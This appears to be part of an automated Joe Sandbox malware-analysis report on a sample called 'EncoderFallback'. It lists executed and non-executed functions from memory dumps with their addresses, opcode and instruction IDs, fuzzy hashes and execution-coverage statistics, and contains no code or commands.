                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction ID: 0d9b179ab875d5eefd57d296512e2bd935383999bafa6bfec5a67f8b7bc1ea45
                                                                                          • Opcode Fuzzy Hash: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction Fuzzy Hash: E6E0C9B5E04208EFDB54DFA8D54169CBBF8EB49310F10C0A9D81893341D6359A52DF80
                                                                                          Function 0739A788 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction ID: b71587ba4108da3262809cf8c24612889f4dee14118cabd809767f74b12a0e22
                                                                                          • Opcode Fuzzy Hash: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction Fuzzy Hash: 5CE0C9B4D04208EFEB54DFE8D54169CBBF8EB48310F10C1A9D81893341D6329A52DF80
                                                                                          Function 0739D6E0 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction ID: abdb7c121ced55cd64cf590f5c55aaa4f0dc55f2ba7ca25debb7eda9d46da602
                                                                                          • Opcode Fuzzy Hash: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction Fuzzy Hash: 61E0C9B5E04208EFDB54DFA8D541A9CBBF8EB48310F10C0A9D81897341D6319A52DF80
                                                                                          Function 05D20EA0 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 989122502dae68687ad9bd7eafa26a079aeea74e14de2149969ebb46d0a97cc6
                                                                                          • Instruction ID: 9810585971e40151c20e240fdfed97c7a9805462a5341b71aa94eee9b4ca3f49
                                                                                          • Opcode Fuzzy Hash: 989122502dae68687ad9bd7eafa26a079aeea74e14de2149969ebb46d0a97cc6
                                                                                          • Instruction Fuzzy Hash: B9E0D830909248DBE754EBE89541778BFB4A706104F1480EDC88543381D7339A46D7D1
                                                                                          Function 0739A570 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a2a879ef6583b60b51fbc2d28a99ec540130660091aa955be9b369b7caedbfb1
                                                                                          • Instruction ID: 1fe4cbbc6569b870bb2ddf1d53dc7aca716e84aad7fc8b0238a0c208d458e26d
                                                                                          • Opcode Fuzzy Hash: a2a879ef6583b60b51fbc2d28a99ec540130660091aa955be9b369b7caedbfb1
                                                                                          • Instruction Fuzzy Hash: 39E0C2B4E04208AFDB98DFA8D5406ACBBF8AB88200F10C1A9885897341E6319A42CB80
                                                                                          Function 0739F5C8 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a2a879ef6583b60b51fbc2d28a99ec540130660091aa955be9b369b7caedbfb1
                                                                                          • Instruction ID: 03b2dbf732bbbd1cbcea0ebd318e967afb49a3e51d576cb55546803cbe4636e0
                                                                                          • Opcode Fuzzy Hash: a2a879ef6583b60b51fbc2d28a99ec540130660091aa955be9b369b7caedbfb1
                                                                                          • Instruction Fuzzy Hash: E3E0E5B4E04208EFDB54DFA8D5446ACBBF8EB48214F10C0E9C82CD3341D6319A42CF80
                                                                                          Function 0739A428 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a2a879ef6583b60b51fbc2d28a99ec540130660091aa955be9b369b7caedbfb1
                                                                                          • Instruction ID: 645ba367354500fefed307efd7ef3799ce5271a064ec6903a47545b19b4b4109
                                                                                          • Opcode Fuzzy Hash: a2a879ef6583b60b51fbc2d28a99ec540130660091aa955be9b369b7caedbfb1
                                                                                          • Instruction Fuzzy Hash: FFE0E5B4E04208EFDB54DFE8D5456ACBBF8EB48200F10C1E9C81C93341D6319A42CF81
                                                                                          Function 0739F000 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 844056e733bad1eeedcc9a89035b2c1211ee244e66da3538f5056a5b1a881a7d
                                                                                          • Instruction ID: 59c9bd3a448e6524769f44cce6e8e02d0a030ffcb11b39a0fe1986b2ec9cc5dd
                                                                                          • Opcode Fuzzy Hash: 844056e733bad1eeedcc9a89035b2c1211ee244e66da3538f5056a5b1a881a7d
                                                                                          • Instruction Fuzzy Hash: 1BE01AB0D492089BEB54EBF8964929DBBF8AB05201F2041A9D808E3381DA709A41C792
                                                                                          Function 07399CF8 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a2a879ef6583b60b51fbc2d28a99ec540130660091aa955be9b369b7caedbfb1
                                                                                          • Instruction ID: 56fcc43c4e006d2902d10eae75d12e34925c9c86799f0255682a98fc89e1a17e
                                                                                          • Opcode Fuzzy Hash: a2a879ef6583b60b51fbc2d28a99ec540130660091aa955be9b369b7caedbfb1
                                                                                          • Instruction Fuzzy Hash: CCE0EDB5D04208EFDB58DFA8D54469DBBF8EB89200F20C0E9C81C93341D631AA42CF40
                                                                                          Function 05D25DD0 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3fb18b07f7eda787009d466bbfbc14365041101a6479cd3d86cb762f8027c365
                                                                                          • Instruction ID: f893988b2a10a3d00e8c759236ef59c03c05a68d8e192172d07303fee3022d7b
                                                                                          • Opcode Fuzzy Hash: 3fb18b07f7eda787009d466bbfbc14365041101a6479cd3d86cb762f8027c365
                                                                                          • Instruction Fuzzy Hash: B5E0E574D08218ABDB14DF98D544AACBFB9AB48214F1080AAD86857381D6359A52DB80
                                                                                          Function 05D23BA9 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 63786006d3ac450189d7e04adbfd51ceb4921a0932cdf8d84234868e73e40039
                                                                                          • Instruction ID: 694c6e854bb8bce450e7fc9ff109d0505a630e6125cdbe2e8291acc9a53173ca
                                                                                          • Opcode Fuzzy Hash: 63786006d3ac450189d7e04adbfd51ceb4921a0932cdf8d84234868e73e40039
                                                                                          • Instruction Fuzzy Hash: 94F0F874900159CFDB64DF60D990B9DB7F9AF44300F50C5EA850EB7240DA32AE82CF10
                                                                                          Function 05D25B20 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3fb18b07f7eda787009d466bbfbc14365041101a6479cd3d86cb762f8027c365
                                                                                          • Instruction ID: 493e70adf139ccb3ee7b8a8cc5bfc720d5b4985e561605c39f4a59c3eb85b6ca
                                                                                          • Opcode Fuzzy Hash: 3fb18b07f7eda787009d466bbfbc14365041101a6479cd3d86cb762f8027c365
                                                                                          • Instruction Fuzzy Hash: B2E0E574D08218EFDB14DF98D540AACBFB9AB5A215F2080AAD858A7381D6319A52DB80
                                                                                          Function 0123E5E8 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 89230612dff77f5f07595b640a63ecd812ef23b6ee8c2384c56e2605c7935b55
                                                                                          • Instruction ID: 18f26cb09a2282893d0d7ee7d8b3b86848b62043556cd7238395783a779b9e81
                                                                                          • Opcode Fuzzy Hash: 89230612dff77f5f07595b640a63ecd812ef23b6ee8c2384c56e2605c7935b55
                                                                                          • Instruction Fuzzy Hash: 10E026B4808218EFD704CFD8D50196CFFBCAB85300F1080E9D80857381C6319E42EF90
                                                                                          Function 05D22E9E Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dde4a3bee7e9e56ac501aa6091335451e52385e8fcab995d217452ee8f95bdb2
                                                                                          • Instruction ID: f135b6454db78b0f1694e6efa6bfdfbf480e4454f4d3e8cd6b5e27a027e991d1
                                                                                          • Opcode Fuzzy Hash: dde4a3bee7e9e56ac501aa6091335451e52385e8fcab995d217452ee8f95bdb2
                                                                                          • Instruction Fuzzy Hash: 74F0A57180461A9BCF119F94C804AD9B772FF99315F108685A55977224DB30AAD5CF90
                                                                                          Function 07398B50 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 186815a50257f5a2ebc7f60ba88a7dd2cac5a0813e54cb54363e582577515fcd
                                                                                          • Instruction ID: 288821298eb73a6ad2139c382f146ff8b63ce2cd83d4a51646c1222b78af2080
                                                                                          • Opcode Fuzzy Hash: 186815a50257f5a2ebc7f60ba88a7dd2cac5a0813e54cb54363e582577515fcd
                                                                                          • Instruction Fuzzy Hash: D5E01AB4D04208EFDB14DF98D5406ACBBF8AB89210F1480E9C81857381C6319A42DB84
                                                                                          Function 05D265D0 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fde83bcb377614d441dab5c114fde016c3d26782979b3d31e7eebe69cc445ab0
                                                                                          • Instruction ID: 11410e57ab557a07ed6dc5d6b6865221e4305fbce5cb1142c9edeff6ac0105aa
                                                                                          • Opcode Fuzzy Hash: fde83bcb377614d441dab5c114fde016c3d26782979b3d31e7eebe69cc445ab0
                                                                                          • Instruction Fuzzy Hash: C1E08C74908208DBDB08DFA4D94056CBBB8AB45308F2081EDC81817385CA31DE42CB80
                                                                                          Function 05D207C8 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fde83bcb377614d441dab5c114fde016c3d26782979b3d31e7eebe69cc445ab0
                                                                                          • Instruction ID: 4fc2cb1880e97aa530eb7e54fc6a43fa72d80d7e49db2e8a44b93c0326f5e93f
                                                                                          • Opcode Fuzzy Hash: fde83bcb377614d441dab5c114fde016c3d26782979b3d31e7eebe69cc445ab0
                                                                                          • Instruction Fuzzy Hash: BCE08C34909208DBD708DF94D94896CBBB8AB45304F2080E9C81817381CA31AE42CB80
                                                                                          Function 05D20568 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 42cb4eaaf2b9f02abf0685ed61f1febd0ddc20d9be743f0e9f70f30085c8557c
                                                                                          • Instruction ID: 052d09dac836c040c5253ef5118c60933864135b15233f98c36e97596a90da65
                                                                                          • Opcode Fuzzy Hash: 42cb4eaaf2b9f02abf0685ed61f1febd0ddc20d9be743f0e9f70f30085c8557c
                                                                                          • Instruction Fuzzy Hash: 64E0C2B180110CEFD750EFF4850065E7BF8AB45200F0004E6C00997250EA314A009792
                                                                                          Function 05D27090 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fde83bcb377614d441dab5c114fde016c3d26782979b3d31e7eebe69cc445ab0
                                                                                          • Instruction ID: 97ca0faafcfbb2ffbe17cfd161f8a96f3bf571bd5b58ee0d4eb9cf970cac73e0
                                                                                          • Opcode Fuzzy Hash: fde83bcb377614d441dab5c114fde016c3d26782979b3d31e7eebe69cc445ab0
                                                                                          • Instruction Fuzzy Hash: 60E0C274D08208DBD718DFD4DA4056CBFB8FB85304F2080E9C80817385CA329E87CB81
                                                                                          Function 0123CE50 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e37a3c33a5fbda2f1966ef1b74ec708014b1ebea59e250ce73caabd9b6e40ec2
                                                                                          • Instruction ID: e89c6cb86c9c33458fc98d62f994796fcba21df844cc8bd4257a7fd683917a31
                                                                                          • Opcode Fuzzy Hash: e37a3c33a5fbda2f1966ef1b74ec708014b1ebea59e250ce73caabd9b6e40ec2
                                                                                          • Instruction Fuzzy Hash: 06E08CB1800208DBE704EFF8C904A4A7BF9EB05201F0001E5D20993251EB314A1097A2
                                                                                          Function 0739B6B0 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ce7a7a519e0e404d2504e01d01741d71a26f7092051b9fd7bb8a17c317866cc4
                                                                                          • Instruction ID: a4824022c028ecad2d903db0ab3b7d44b66569c58b7002f046e865a8b00a93ef
                                                                                          • Opcode Fuzzy Hash: ce7a7a519e0e404d2504e01d01741d71a26f7092051b9fd7bb8a17c317866cc4
                                                                                          • Instruction Fuzzy Hash: 5FE012F180110CDFE754FFF4950065E7BF99B45201F1004F5D50997250EA315A5497A2
                                                                                          Function 0739E2B0 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eff2c4ba2670405558810f6e39d01da94147bdf1d44708c2b6059f99252ba406
                                                                                          • Instruction ID: 7f3cf731677ac108d8c08c5c7e17b98f413ae7cb2afcd484c9d415d0212bd8b5
                                                                                          • Opcode Fuzzy Hash: eff2c4ba2670405558810f6e39d01da94147bdf1d44708c2b6059f99252ba406
                                                                                          • Instruction Fuzzy Hash: D8E08CB590820CDBEB08EBD4D5406ACBBB8AB46300F2080ECC80817381C6329E42CB80
                                                                                          Function 01230848 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1f2f6872aad52d943019cc7cb1cf4d7be0a81613c3836a53f2128c8a8b9a597a
                                                                                          • Instruction ID: 5a4b8dce57ae7db663f3cfe4e651cee1948327b515797a3769548d417373644b
                                                                                          • Opcode Fuzzy Hash: 1f2f6872aad52d943019cc7cb1cf4d7be0a81613c3836a53f2128c8a8b9a597a
                                                                                          • Instruction Fuzzy Hash: E6D01730E05208EB8B04EFF8EA0159DB7F9EB49204B1081A9A409E7600EA316F409B81
                                                                                          Function 05D21BDF Relevance: .0, Instructions: 12COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8161588c73e3a497ab00f2b5126de1a0297d0c1abfee13013549f730440930da
                                                                                          • Instruction ID: f2a5fc17235994845a1616f89426e9894c2d5ec2026c58f02532c37b9f1d959e
                                                                                          • Opcode Fuzzy Hash: 8161588c73e3a497ab00f2b5126de1a0297d0c1abfee13013549f730440930da
                                                                                          • Instruction Fuzzy Hash: B2D01238604008EBCB00CE40D850C69B772EF95314B10C18AAC4917341C733DE13EA80
                                                                                          Function 0739E758 Relevance: .0, Instructions: 12COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 32e00506294160712f557471299414c1c3088546860f9f7773b07f13b10c34f4
                                                                                          • Instruction ID: 6afd4798fefb7950de485733b1cefa7eee1b2ef0784adfeb6a351e843327204d
                                                                                          • Opcode Fuzzy Hash: 32e00506294160712f557471299414c1c3088546860f9f7773b07f13b10c34f4
                                                                                          • Instruction Fuzzy Hash: 82C08CF208A30986F628628463083303ADCA302A0AF0018A0851D004928AB08080C253
                                                                                          Function 0123CC80 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6e12d637fca2ce080465741e72b1e7eaacbb7512dda4ddac74206b49540426c2
                                                                                          • Instruction ID: 5182e8151fc92409d4859bec81c83964b74a8c63cf19ad961906fdeaecadc3e1
                                                                                          • Opcode Fuzzy Hash: 6e12d637fca2ce080465741e72b1e7eaacbb7512dda4ddac74206b49540426c2
                                                                                          • Instruction Fuzzy Hash: 7EC08CB1000348CBF2A83BF8AA0D7283FEC6B00203F0000E0D36C900D1ABB040A0D7A6

                                                                                          Non-executed Functions

                                                                                          Function 05D3A2C0 Relevance: .2, Instructions: 224COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 302d1665e6255cb8403d47c371f61eea2f811810ca1edfd0c1d95c7f39b2f7ae
                                                                                          • Instruction ID: d014a3cc7bf788580037065ec75bc18aadd73a8286ac7a460f468236a51604bb
                                                                                          • Opcode Fuzzy Hash: 302d1665e6255cb8403d47c371f61eea2f811810ca1edfd0c1d95c7f39b2f7ae
                                                                                          • Instruction Fuzzy Hash: C8911470A04218CFDB54DFA8DA49BADBBF2FB4A314F20906AD489B7755DB349985CF00
                                                                                          Function 05D3A2B0 Relevance: .2, Instructions: 223COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5a761546980a43bdb58b12c29f6ebb9aeefc5fc9059bcba68660da95aebd5955
                                                                                          • Instruction ID: 1081289142c0c6adbd3da95b4e439307c4a802c87279a3e694f8cb16095509f9
                                                                                          • Opcode Fuzzy Hash: 5a761546980a43bdb58b12c29f6ebb9aeefc5fc9059bcba68660da95aebd5955
                                                                                          • Instruction Fuzzy Hash: 74911370A04218CFDB54DFA8DA49BADBBF2FB4A314F20906AD489B7755DB349985CF00
                                                                                          Function 05D3A61A Relevance: .2, Instructions: 215COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0752569eb7b53ac539ef01730d989bf455b584eb31f30b55a62b0fa95301d2e3
                                                                                          • Instruction ID: 2f55bdd3a2d6d5e9c2e40edb1f6cf6aa1dc1efb7850763f3e8ec6fb1c26cb89a
                                                                                          • Opcode Fuzzy Hash: 0752569eb7b53ac539ef01730d989bf455b584eb31f30b55a62b0fa95301d2e3
                                                                                          • Instruction Fuzzy Hash: DD911370E04218CFDB54DFA9DA45BADBBF2FB4A314F20906AD089A7759DB349885CF00

                                                                                          Execution Graph

                                                                                          Execution Coverage:12.3%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:52
                                                                                          Total number of Limit Nodes:6
